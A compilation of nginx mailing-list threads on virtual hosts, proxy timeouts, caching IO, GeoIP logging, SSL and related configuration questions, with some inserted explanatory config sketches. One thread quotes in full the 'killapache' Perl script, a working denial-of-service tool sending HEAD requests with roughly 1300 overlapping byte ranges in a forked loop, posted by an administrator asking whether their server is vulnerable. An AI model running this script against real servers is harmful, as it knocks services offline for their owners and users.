Channel: Nginx Forum - Nginx Mailing List - English

Subdomain configuration problem (1 reply)

Hi,

I'm a beginner with nginx, and I have searched Google and the mailing list, but with no
luck.

my nginx.conf:

http {
    server {
        listen 80;
        server_name example.com www.example.com;
        location / {
            proxy_pass http://127.0.0.1:aaaa/;
        }
    }
    server {
        listen 80;
        server_name subdomain.example.com;
        location / {
            proxy_pass http://127.0.0.1:bbbb/;
        }
    }
    # rest of the default config: access log, etc.
}



The problem: after adding the server block for the subdomain, requests for both example.com and subdomain.example.com load example.com in the browser. If I place the subdomain server block first, both requests load subdomain.example.com instead.

Please suggest what the problem could be.
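For readers hitting the same symptom: when every request lands in whichever server block is listed first, nginx is usually falling back to the default server because the incoming Host header matches none of the server_name values. A minimal sketch (ports and names are illustrative, not the poster's actual values) that makes the intended fallback explicit:

```nginx
# Mark the intended catch-all explicitly instead of relying on block order.
server {
    listen 80 default_server;
    server_name example.com www.example.com;
    location / {
        proxy_pass http://127.0.0.1:8081/;
    }
}

server {
    listen 80;
    server_name subdomain.example.com;
    location / {
        proxy_pass http://127.0.0.1:8082/;
    }
}
```

If both hostnames still land in the first block, a reasonable next step is checking that DNS for subdomain.example.com actually points at this machine and that the browser sends the expected Host header.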


Thanks in Advance!!
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

Nginx 1.8 proxying to Netty - timeout from upstream (1 reply)

I have set up Nginx as a proxy to a Netty server. I am seeing a timeout from the upstream, i.e. Netty. The consequence of this timeout is that the JSON payload response is truncated (as seen in the browser developer tools).

2015/07/21 05:08:56 [error] 6#0: *19 upstream prematurely closed connection while reading upstream, client: 198.147.191.15, server: sbox-wus-ui.cloudapp.net, request: "GET /api/v1/entities/DEVICE HTTP/1.1", upstream: "http://10.0.3.4:8080/api/v1/entities/DEVICE", host: "sbox-wus-ui.cloudapp.net", referrer: "https://sbox-wus-ui.cloudapp.net/home.html"

So, yes, I initially thought this was a Netty issue. However, when I make the same API call against Netty directly, I am able to retrieve the full JSON payload.

The JSON response is about 13 KB, but the response I see on the Nginx side is 10 KB. After spending some time reading up on the Nginx configuration parameters, I added client_body_temp and proxy_temp, but to no avail. Any help is really appreciated.

Nginx details:

nginx version: nginx/1.8.0
built by gcc 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC)
built with OpenSSL 1.0.1e-fips 11 Feb 2013
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'

-----

# For more information on configuration, see:
# * Official English Documentation: http://nginx.org/en/docs/
# * Official Russian Documentation: http://nginx.org/ru/docs/

user nginx;
worker_processes 1;
daemon off;

error_log {{logDir}}/error.log;

pid /run/nginx.pid;


events {
worker_connections 1024;
}


http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log {{logDir}}/access.log main;

    sendfile on;
    #tcp_nopush on;

    #keepalive_timeout 0;
    keepalive_timeout 65;

    chunked_transfer_encoding off;

    # Disable constraints on potentially large uploads resulting in HTTP 413
    client_max_body_size 0;

    #gzip on;

    index index.html index.htm;

    upstream netty { {% for netty in servers %}
        server {{netty}}; {% endfor %}
    }

    # Load modular configuration files from the /etc/nginx/conf.d directory.
    # See http://nginx.org/en/docs/ngx_core_module.html#include
    # for more information.
    include /etc/nginx/conf.d/*.conf;

    server {
        listen 80;
        server_name {{serverName}};
        rewrite ^ https://$server_name$request_uri? permanent;
    }

    server {
        listen 443 ssl;
        server_name {{serverName}};
        ssl_certificate /data/nginx/cert/{{crtFile}};
        ssl_certificate_key /data/nginx/cert/{{keyFile}};

        root /usr/share/nginx/html;

        #charset koi8-r;

        #access_log /var/log/nginx/host.access.log main;

        # Load configuration files for the default server block.
        include /etc/nginx/default.d/*.conf;

        # The only resource available to check health
        location /health {
            root /apps/nginx/f2;
            index index.html;
        }

        location / {
            client_body_buffer_size 128k;

            client_body_temp_path /apps/nginx/client_body_temp;

            proxy_connect_timeout 90;
            proxy_send_timeout 90;
            proxy_read_timeout 90;

            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
            proxy_temp_path /apps/nginx/proxy_temp;
            root /apps/nginx/f2;
            index index.html;
            {% if basicAuth == "true" %}
            auth_basic "Restricted";
            auth_basic_user_file /data/nginx/cert/htpasswd;
            {% endif %}
        }

        location /ui/ {
            proxy_pass http://netty;
            {% if basicAuth == "true" %}
            auth_basic "Restricted";
            auth_basic_user_file /data/nginx/cert/htpasswd;
            {% endif %}
        }

        location /api/ {
            proxy_pass http://netty;
        }

        location /sales/ {
            root /apps/nginx/f2;
            index index.html;
            {% if basicAuth == "true" %}
            auth_basic "Restricted";
            auth_basic_user_file /data/nginx/cert/htpasswd;
            {% endif %}
        }

        # redirect server error pages to the static page /40x.html
        error_page 404 /404.html;
        location = /40x.html {
        }

        # redirect server error pages to the static page /50x.html
        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
        }
    }
}
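A hedged observation on this symptom: "upstream prematurely closed connection" means Netty closed the socket before nginx finished reading the response, so client_body_temp and proxy_temp (which affect request bodies and temporary files, not the upstream connection's lifetime) are unlikely to help. If the upstream closes connections eagerly, one thing worth trying (a sketch with illustrative names and values, not a verified fix) is speaking HTTP/1.1 with keepalive toward the upstream:

```nginx
# Sketch: keep upstream connections open and speak HTTP/1.1 to Netty.
upstream netty_backend {
    server 10.0.3.4:8080;
    keepalive 16;                # pool of idle keepalive connections
}

server {
    location /api/ {
        proxy_http_version 1.1;  # the default is 1.0, which some servers close eagerly
        proxy_set_header Connection "";
        proxy_pass http://netty_backend;
    }
}
```

If the truncation persists, capturing the exchange on the nginx-to-Netty leg (e.g. with tcpdump) would show which side actually drops the last 3 KB.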

Fetching a string by parsing URL (6 replies)

I have a web server sitting behind Nginx. If there is an error, then I want to fetch some information from the url and pass it on to a static file as parameters. I have configured Nginx to fetch the query parameters from the url using $arg_param_name.

However, I also need to fetch a string from the URL path itself. For instance, if the URL is "www.website.com/path1/path2?arg1=val&arg2=someval", how can I parse it to fetch the last path segment (path2 in this case)? My location directive is as below:

location ~* /path1/ {
    ...
}

The URL, however, need not always have the same number of path segments; it can also have three. So I can't use $1, $2, etc. I need to fetch the last segment, i.e. the one immediately followed by the query string (the ? symbol). Is it possible to do this in Nginx directly?
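One possible approach (a sketch only, not tested against the poster's setup): a regex location with a named capture that matches the final path segment regardless of how many segments precede it. Since nginx regexes are PCRE, the (?<name>...) named-capture syntax is available:

```nginx
# Capture the last path segment into $last, however deep the path is.
location ~ ^/path1/(?:.*/)?(?<last>[^/]+)/?$ {
    # $last holds e.g. "path2" for /path1/path2?arg1=val
    return 200 "last segment: $last\n";
}
```

The query string is not part of the matched URI in nginx, so the regex does not need to account for the ? symbol.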

Thanks.

proxy_pass redirection (1 reply)

Hi,
I'm new to Nginx and we are using it as a reverse proxy.

I was able to configure Nginx and it's working, but I have a challenge in configuring a dynamic proxy_pass. I've tried to use wildcard characters in proxy_pass, but it's not working; please help.

E.g.:

server {
    #listen 443;
    listen 8080;
    #server_name analyticstest.isyntax.net;
    server_name IP;

    location /api/ingestion/ {
        proxy_set_header HOST $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_buffers 8 512k;
        proxy_buffer_size 2024k;
        proxy_busy_buffers_size 2024k;
        proxy_read_timeout 3000;
        add_header Cache-Control no-cache;
        #rewrite ^/api/query/(.*)$ /$1;
        proxy_pass http://IP:8881/ingestion/v1.0/streams/NGINEX;
        # (IP: hostname of the server where the service runs)
    }
}

In my case, the last word in the above URL, NGINEX, can be any other name, so how can I configure that segment dynamically? I tried wildcard characters like *, . and _, but they are not working. Please help.
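A possible direction (a sketch; the upstream URL layout is taken from the post, while the capture name and the IP are illustrative placeholders): capture the variable segment with a regex location and interpolate it into proxy_pass. Note that when proxy_pass contains variables, nginx must be able to resolve the target, which a literal IP satisfies:

```nginx
location ~ ^/api/ingestion/(?<stream>[^/]+)$ {
    # $stream is whatever follows /api/ingestion/, e.g. NGINEX or any other name
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_pass http://10.0.0.1:8881/ingestion/v1.0/streams/$stream;
}
```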

Thank you

--
Posted via http://www.ruby-forum.com/.


How to run nginx unit tests? (2 replies)

Hello! I just built and installed nginx on my Linux system. Are there any unit, smoke, or regression tests available to test the install?

Thanks for your help.

Doubt about killapache attack on nginx server (no replies)

Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my server is vulnerable to the Apache Killer attack, because when he runs the following script it shows "host seems vuln". I searched this forum and found: "First of all, nginx doesn't favor HEAD requests with compression, so the exact mentioned attack doesn't work against a standalone nginx installation." I also checked the source file "src/http/modules/ngx_http_range_filter_module.c"; I think it should have been patched to prevent handling malicious range requests. Any idea why it still shows "host seems vuln"? Thanks a lot!
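For context: the script below only checks whether the server answers a multi-range HEAD request with a "Partial" (206) status line, which by itself does not demonstrate memory exhaustion. If capping range handling is desired anyway, newer nginx versions (1.1.2+, so after the poster's 1.0.11) provide the max_ranges directive; a sketch with an illustrative location and limit:

```nginx
# Sketch: cap how many byte ranges a single request may ask for.
# Requests exceeding the limit get the full (200) response instead of 206.
location /downloads/ {
    max_ranges 5;
}
```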

----------------------------------------------------------------- killapache script ---------------------------------------------------------------
use IO::Socket;
use Parallel::ForkManager;

sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl <host> [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";

    $pm = new Parallel::ForkManager($numforks);

    $|=1;
    srand(time());
    $p = "";
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }

    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;

        $x = "";
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                         PeerPort => "80",
                                         Proto => 'tcp');

        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;

        while(<$sock>) {
        }
        $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                     PeerPort => "80",
                                     Proto => 'tcp');

    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;

    $x = <$sock>;
    if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
    } else {
        return 0;
    }
}

if ($#ARGV < 0) {
    usage;
    exit;
}

if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {
    $numforks = 50;
}

$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
}
while(1) {
    killapache();
}

Tweak fastcgi_buffer (no replies)

Hello,

I need to raise the fastcgi buffers to 1 MB total on a website that has heavy responses, to avoid buffering to disk. If I use a distro with a 4096-byte page size, is it better to use 256 x 4k or 4 x 256k?

[root@web ~]# getconf PAGESIZE
4096
[root@web ~]#

fastcgi_buffer_size 4k;
fastcgi_buffers 256 4k;

OR

fastcgi_buffer_size 256k;
fastcgi_buffers 4 256k;

Thanks!

Karl

Nginx writing to Cephfs (2 replies)

Hello,

I'm having an issue with nginx writing to cephfs. Often I'm getting:

writev() "/home/ceph/temp/44/94/1/0000119444" failed (4: Interrupted
system call) while reading upstream

looking with strace, this happens:

....
write(65, "e\314\366\36\302"..., 65536) = ? ERESTARTSYS (To be restarted)

It happens after the first 4 MB (exactly) are written; the subsequent write gets
ERESTARTSYS (sometimes, but more rarely, it fails after the first 32 or
64 MB, etc.). Apparently nginx doesn't expect this and doesn't handle it,
so it cancels the writes and deletes the partial file.
Looking at the code, I saw it doesn't handle ERESTARTSYS any differently
from other write errors. Shouldn't it retry the same write a couple of
times before finally giving up and erroring out? Do you have any
suggestions on how to resolve this? I'm using the latest stable nginx.
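A workaround sketch, under the assumption (suggested by the "while reading upstream" part of the error) that the failing writes are nginx's upstream-buffering temporary files: point the temp path at a local filesystem so cephfs is only involved for the final files. The path below is illustrative:

```nginx
# Sketch: buffer upstream responses on local disk rather than on cephfs.
# /var/cache/nginx must live on a local filesystem.
proxy_temp_path /var/cache/nginx/proxy_temp 1 2;
```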


Regards,
Vedran


keepalive_timeout timeout causes high TTFB (1 reply)

I am trying to further optimize SSL, but if I enable keepalive_timeout I get a high TTFB, as shown in the report below:

http://tools.pingdom.com/fpt/#!/KggzF

When I disable keepalive_timeout the TTFB is fixed, but nginx recommends keepalive_timeout: http://nginx.org/en/docs/http/configuring_https_servers.html

Why does this happen?

I welcome any other advice to further optimize SSL.

Thanks

listen 443 spdy default_server reuseport;
ssl on;
ssl_certificate /etc/ssl/filterbypass.me.crt; #(or .pem)
ssl_certificate_key /etc/ssl/filterbypass.me.key.nopass;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
#keepalive_timeout 70;
#ssl_ciphers ECDHE-RSA-AES256-SHA384:AES256-SHA256:RC4:HIGH:!MD5:!aNULL:!eNULL:!NULL:!DH:!EDH:!AESGCM;
ssl_ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS;
ssl_prefer_server_ciphers on;
ssl_buffer_size 8k;
ssl_session_cache shared:SSL:20m;
ssl_dhparam /etc/ssl/dhparam.pem;
ssl_session_timeout 45m;
ssl_stapling on;
ssl_stapling_verify on;
ssl_trusted_certificate /etc/ssl/trustchain.crt;
resolver 8.8.8.8 8.8.4.4 valid=300s;
resolver_timeout 5s;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";

Optimzing hard drive IO for proxy_pass (no replies)

I have server A with a large HDD at IDC 1 (a TB-sized HDD).
I have server B with cheap bandwidth at IDC 2 (a very small virtual server with a 20 GB HDD).

I send all image requests to server B, and it caches from A.
My problem is that IO on server B is really high.

Server B iostat:

Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util
sda     34.01  517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67
sda1    0.00   0.00   0.00    0.00  0.00     0.00    0.00  0.00 0.00 0.00 0.00
sda2    34.01  517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67
dm-0    0.00   0.00   1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71
dm-1    0.00   0.00   0.00    0.00  0.00     0.00    0.00  0.00 0.00 0.00 0.00

Here is my related nginx config
--------------- cut --------------------------------------
proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g;
--------------- cut --------------------------------------
location / {
    proxy_pass http://server_a/;
    proxy_cache MEDIA;
    proxy_cache_key "$scheme$request_uri";

    proxy_cache_valid 200 302 304 7d;
    proxy_cache_valid 301 1h;
    proxy_cache_valid any 1m;
    proxy_cache_use_stale error timeout invalid_header http_500
                          http_502 http_503 http_504 http_404 updating;
    proxy_ignore_headers Cache-Control Expires Set-Cookie;
    proxy_cache_min_uses 3;
    proxy_cache_lock on;
    proxy_cache_lock_timeout 15s;

    expires 7d;
}
--------------- cut --------------------------------------

Server B has nothing else running.
Server B is sending about 200~400 MBs of traffic outbound.
Is such a high IO load normal?
Is there a way I can decrease the IO load while keeping server B's caching
efficient?
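One hedged idea, not a verified diagnosis: if proxy_temp_path and the cache directory sit on different filesystems, every cached response is effectively written twice (once to the temp file, once copied into the cache tree), doubling write IO. Keeping both on the same filesystem, or using use_temp_path=off (available from nginx 1.7.10), avoids the extra write:

```nginx
# Sketch: write cache files in place instead of going through a temp file first.
proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m
                 inactive=2d max_size=6g use_temp_path=off;
```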

Thank you.

upstart conf for managing nginx (1 reply)

Hello,
I wrote a small upstart script to stop/start nginx through upstart. This is
how it looks:

description "nginx http daemon"
start on (filesystem and net-device-up IFACE=lo)
stop on runlevel [!2345]
expect daemon
respawn
respawn limit 10 5
chdir /usr/local/nginx
exec ./nginx


I am running nginx from "/usr/local/nginx", as a user with superuser
privileges.

Still, it hangs on the start/stop command. Any idea what I may be missing?
Thanks,
Vikrant

Alias regex use causing core dump as of nginx 1.7.1 (2 replies)

Hi, after upgrading from the v1.6.3 to the v1.8.0 stable branch, an alias I used for Roundcubemail no longer works.
I traced the issue back to a probable change made in nginx v1.7.1:
"Bugfix: the "alias" directive used inside a location given by a regular expression worked incorrectly if the "if" or "limit_except" directives were used."

In version 1.6.3 and 1.7.0 the following works fine:
## Roundcubemail for the Remi repository
location ~ ^/mail/(.+\.php)$ {
    alias /usr/share/roundcubemail/$1;
    client_max_body_size 5M;
    fastcgi_pass _php;
}
location ~ /mail {
    alias /usr/share/roundcubemail/;
    client_max_body_size 5M;
    try_files $uri $uri/ /index.php;
}

But in v1.7.1 it causes nginx to core dump if I visit the URL domain.com/mail, and if I visit domain.com/mail/ I get taken to the front page.

[notice] 26221#0: signal 17 (SIGCHLD) received
[alert] 26221#0: worker process 26223 exited on signal 11 (core dumped)
[notice] 26221#0: start worker process 26231
[notice] 26221#0: signal 29 (SIGIO) received

Optimzing hard drive IO for proxy_pass (1 reply)

I have server A with a large HDD at IDC 1 (a TB-sized HDD).
I have server B with cheap bandwidth at IDC 2 (a very small virtual server with a 20 GB HDD).

I send all image requests to server B, and it caches from A.
My problem is that IO on server B is really high.

Server B iostat:

Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util
sda     34.01  517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67
sda1    0.00   0.00   0.00    0.00  0.00     0.00    0.00  0.00 0.00 0.00 0.00
sda2    34.01  517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67
dm-0    0.00   0.00   1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71
dm-1    0.00   0.00   0.00    0.00  0.00     0.00    0.00  0.00 0.00 0.00 0.00

Here is my related nginx config
--------------- cut --------------------------------------
proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g;
--------------- cut --------------------------------------
location / {
    proxy_pass http://server_a/;
    proxy_cache MEDIA;
    proxy_cache_key "$scheme$request_uri";

    proxy_cache_valid 200 302 304 7d;
    proxy_cache_valid 301 1h;
    proxy_cache_valid any 1m;
    proxy_cache_use_stale error timeout invalid_header http_500
                          http_502 http_503 http_504 http_404 updating;
    proxy_ignore_headers Cache-Control Expires Set-Cookie;
    proxy_cache_min_uses 3;
    proxy_cache_revalidate on;
    proxy_cache_lock on;
    proxy_cache_lock_timeout 15s;

    expires 7d;
}
--------------- cut --------------------------------------

Server B has nothing else running.
Server B is sending about 200~400 MBs of traffic outbound.
Is such a high IO load normal?
Is there a way I can decrease the IO load while keeping server B's caching
efficient?

Thank you.

Using dynamic access_log, automatically create parent directory (no replies)

We use a dynamic value for access logs:

access_log /var/log/nginx/domains/$host/access.log main;

However, if the $host directory does not exist in /var/log/nginx/domains, nginx fails with an error creating the access log. Is there a way to have nginx create the $host directory automatically instead of failing?

Seems like this should be default behavior?

Nginx response with persistence session and backend server failure (2 replies)

Hello all,

I was reading the Nginx documentation
<http://nginx.org/en/docs/http/ngx_http_upstream_module.html?&_ga=1.189051176.2090890265.1437394769#sticky_cookie>
on persistent sessions using cookies, and below is an excerpt:

"A request that comes from a client not yet bound to a particular server is
passed to the server selected by the configured balancing method. Further
requests with this cookie will be passed to the designated server. If the
designated server cannot process a request, the new server is selected as
if the client has not been bound yet."

The last line says: "If the designated server cannot process a request."

What does it mean for a server to be unable to process a request?

Question 1:
Does it mean the server was down?
Or that the server responded with an error code?
Or that it did not respond within a certain time interval?
Or that the maximum connection limit was reached on that server?

Question 2:
Say there are 3 backend servers and we are using session persistence with a
cookie.
Now assume 2 of the backend servers go down, so nginx routes all requests to
the 3rd server.
When the 2 other servers come back online, will nginx route requests to them
even if the request carries the persistence cookie for the 3rd server?


Thanks
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx

GeoIP data in access_log Nginx (1 reply)

Hello World,

I would like to know whether it is possible to put GeoIP data (the country, for example) in my nginx access log.
I enabled the GeoIP module in my nginx build (configure) and I would like to use "$geoip_country_name" and "$geoip_city" in my access log.
I tried adding the two variables to my log format (main), but without success.

log_format main
'$host $remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$geoip_country_name" "$geoip_city"';

Result :

my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "-" "-"

But i would like this one :

my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "FR" "Paris"
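A hedged guess at the missing piece: compiling nginx with the GeoIP module only provides the directives; the variables stay empty ("-") until the MaxMind databases are actually loaded at the http level. The database paths below are illustrative and distribution-dependent:

```nginx
# In the http{} block: load the databases so the GeoIP variables are populated.
geoip_country /usr/share/GeoIP/GeoIP.dat;       # fills $geoip_country_name etc.
geoip_city    /usr/share/GeoIP/GeoIPCity.dat;   # $geoip_city needs the city database
```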

Thanks for your help,

Best regards,
Jugurtha

Is SSL and Compression never secure in nginx? (3 replies)

Hi,

I am working on a project where a password-protected extranet application
is behind an nginx proxy using SSL.

I asked the admin to enable server-side HTTP compression, because we
tend to have rather lengthy JSON responses from our REST API; they
compress very well and the performance gain would be significant. He
declined, explaining that because of the CRIME vulnerability it
is not a good idea to enable compression when using SSL with nginx. Is this
really always the case? Are there scenarios where the vulnerability is not
a problem? I am trying to understand this better to make an informed
decision, because not using compression (encryption is a must) would incur
other costs (optimizations in the code), and I don't want to waste that
time and money unless I have to.

Thanks in advance,

Robert

log files as non root user (no replies)

Hello Everyone,

I am trying to configure nginx so that the log and pid files are written to a custom path and owned by a non-root user. Whenever I start nginx, these files are created and owned by root. In nginx.conf I defined the below. Please advise.

user usradmin mwgroup;
worker_processes 1;

error_log /export/local/opt/ngnix/logs/error.log warn;
pid /export/local/opt/ngnix/logs/nginx.pid;


events {
    worker_connections 1024;
}


http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                    '$status $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /export/local/opt/ngnix/logs/access.log main;

    sendfile on;
    #tcp_nopush on;

    keepalive_timeout 65;

    #gzip on;

    include /etc/nginx/conf.d/*.conf;
}

mp4 streaming/seeking works from firefox (fedora) and not from firefox (windows) (nginx 1.9.3) (no replies)

greetings!

I am seeing an unexplained malfunction with nginx when serving videos; FLV and MP4 files have different symptoms. MP4 streams correctly when I view the file in Firefox 39 on Fedora 22, but on Windows 7 (Firefox 39) the file cannot be seeked and must be played linearly.
After speaking with the developers of video.js (the player I use), it was determined that nginx is not returning byte-range data appropriately (or at all), so seeking would not work. However, this does not explain why Firefox 39 on Fedora works perfectly, nor does it provide a solution for getting nginx to serve ranges correctly.

The only advice I have seen is to change the value of the 'max_ranges' directive, but doing that has made no difference. I have left it unset, which I understand to mean 'unlimited'.

An example video from the server is here: src="https://www.ureka.org/file/play/17924/censored%20on%20google%202.mp4"

Any tips welcomed! Thanks

problem with images after refresh website (1 reply)

Hi

I run DirectAdmin + nginx 1.8 + PHP 5.4 (php-fpm).

When I refresh the website, the images do not refresh properly; sometimes after a refresh images end up in the wrong place or are duplicated.
You can look at this website, rhost(dot)biz: refresh a few times, look at the images, and you will see the problem.
What could the problem be?